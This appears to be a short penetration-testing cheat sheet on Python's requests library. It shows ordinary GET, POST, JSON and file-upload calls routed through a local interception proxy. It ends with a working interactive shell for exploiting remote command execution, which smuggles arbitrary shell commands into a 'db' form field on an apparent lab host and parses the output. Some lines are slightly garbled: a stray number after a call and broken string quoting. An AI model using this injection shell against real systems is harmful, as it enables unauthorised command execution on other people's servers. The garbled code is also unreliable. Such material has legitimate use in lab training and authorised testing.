description
Get request, Post request (regular, json, file)
import requests
url = "http://example.com:80/some/path.php"
params = {"p1" :"value1" , "p2" :"value2" }
headers = {"User-Agent" : "fake User Agent" , "Fake header" : "True value" }
cookies = {"PHPSESSID" : "1234567890abcdef" , "FakeCookie123" : "456" }
proxies = {'http' :'http://127.0.0.1:8080' ,'https' :'http://127.0.0.1:8080' }
#Regular Get requests sending parameters (params)
gr = requests .get (url , params = params , headers = headers , cookies = cookies , verify = False , allow_redirects = True )
code = gr .status_code
ret_headers = gr .headers
body_byte = gr .content
body_text = gr .text
ret_cookies = gr .cookies
is_redirect = gr .is_redirect
is_permanent_redirect = gr .is_permanent_redirect
float_seconds = gr .elapsed .total_seconds () 10.231
#Regular Post requests sending parameters (data)
pr = requests .post (url , data = params , headers = headers , cookies = cookies , verify = False , allow_redirects = True , proxies = proxies )
#Json Post requests sending parameters(json)
pr = requests .post (url , json = params , headers = headers , cookies = cookies , verify = False , allow_redirects = True , proxies = proxies )
#Post request sending a file(files) and extra values
filedict = {"<FILE_PARAMETER_NAME>" : ("filename.png" , open ("filename.png" , 'rb' ).read (), "image/png" )}
pr = requests .post (url , data = {"submit" : "submit" }, files = filedict )
#Useful for presenting results in boolean/timebased injections
print (f"\r flag: { flag } { char } , end = "" )Python cmd to exploit a RCE import requests
import re
from cmd import Cmd
class Terminal (Cmd ):
prompt = "Inject => "
def default (self , args ):
output = RunCmd (args )
print (output )
def RunCmd (cmd ):
data = { 'db' : f'lol; echo -n "MYREGEXP"; { cmd } }
r = requests .post ('http://10.10.10.127/select' , data = data )
page = r .text
m = re .search ('MYREGEXP(.*?)MYREGEXP2' , page , re .DOTALL )
if m :
return m .group (1 )
else :
return 1
term = Terminal ()
term .cmdloop ()